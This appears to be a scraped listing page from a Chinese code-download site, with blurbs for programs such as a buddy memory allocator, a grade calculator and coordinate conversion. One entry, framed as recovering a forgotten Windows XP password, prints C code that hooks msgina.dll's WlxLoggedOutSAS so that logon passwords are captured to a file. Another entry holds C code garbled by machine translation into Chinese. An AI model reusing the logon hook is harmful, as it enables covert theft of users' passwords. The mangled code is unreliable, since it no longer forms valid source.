-
伙伴系统虚拟分配和回收内存方法,buddy算法
伙伴系统虚拟分配和回收内存方法,buddy算法-A method about partner systems distribute and recycle memory visually
- 2022-01-24 16:59:51下载
- 积分:1
-
统计学生成绩 已知n个学生的注册号和成绩,计算他们的平均成绩,并列出成绩最好的前t名学生的注册号和分数。...
统计学生成绩 已知n个学生的注册号和成绩,计算他们的平均成绩,并列出成绩最好的前t名学生的注册号和分数。-The software is used to stastic the student grade. For given n students, it caculates the average grade with given student ID and grade and list the best student ID and grade for t out of n .
- 2022-02-25 14:01:53下载
- 积分:1
-
数据结构的一个程序,叫秦九韶算法。计算方法也应用到。
数据结构的一个程序,叫秦九韶算法。计算方法也应用到。-A program of data structure,which named QINGJIUSHAO arithmetic.It also includes caculating method.
- 2022-01-22 12:43:27下载
- 积分:1
-
opc HDA历史服务器源代码下载
资源描述网上找到的OPC HDA服务器开发案例,内有OPC HDA服务程序,有测试用例,那个测试用例不是程序,而是给你看如何实现一个server
- 2022-05-27 19:48:21下载
- 积分:1
-
获取XP登录密码
应用背景当忘记XP系统密码时,可以编译getInfo的dll和exe,执行getInfoRun.exe在下次登录时就可以获取密码了,密码文件保存在windows根目录下的getPwdout.txt文件中关键技术DWORD WINAPI StartHook(LPVOID lpParam)
{
//得到msgina.dll
//hooktable.hMsgina
int n = 0;
hooktable.hMsgina = LoadLibrary("msgina.dll");
n = GetLastError();
if (NULL == hooktable.hMsgina)
{
printf("getmoduleHandle msgina.dll error");
return -1;
}
//得到WlxLoggedOutSAS
hooktable.OldADDR = (WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina, "WlxLoggedOutSAS");
if (NULL == hooktable.OldADDR)
{
printf("GetProcAddress WlxLoggedOutSAS error");
return -1;
}
int *OpCode = (int*)&hooktable.charJmpCode[1];
int Code = (int)hooktable.NewADDR - (int)hooktable.OldADDR -5;
*OpCode = Code;
HookWlxLoggedOutSAS();
return 0;
}
- 2023-08-31 22:05:04下载
- 积分:1
-
vc++编程实例
vc++编程实例vc++编程实例vc++编程实例vc++编程实例vc++编程实例vc++编程实例vc++编程实例vc++编程实例vc++编程实例
- 2023-01-20 16:10:05下载
- 积分:1
-
T =新数据;C ->链接= T;strcpy(T>D,A);T>是= b;t >没有= CC;T ->链接= null;} } { void display() C = S;而(C!= null){
&t=新数据;
- 2023-07-26 06:05:03下载
- 积分:1
-
flex 地图卷动,转发的源码
flex 地图卷动,转发的源码-flex map scrolling
- 2022-07-08 07:39:08下载
- 积分:1
-
测绘行业的坐标转换程序
用于大地坐标系,空间直角坐标系转换
大地坐标系,直角坐标系转换...
测绘行业的坐标转换程序
用于大地坐标系,空间直角坐标系转换
大地坐标系,直角坐标系转换-Mapping the coordinates of the conversion process industries for the geodetic coordinate system, Cartesian coordinate system conversion of space geodetic coordinate system, Cartesian coordinate system conversion
- 2022-03-29 19:12:34下载
- 积分:1
-
fast memory copy, by using the intel s mmx technique, the speed is more than 10...
快速内存拷贝,利用intel的mmx,速度比普通快上几十倍-fast memory copy, by using the intel s mmx technique, the speed is more than 10 faster than the normal one
- 2022-07-23 06:55:05下载
- 积分:1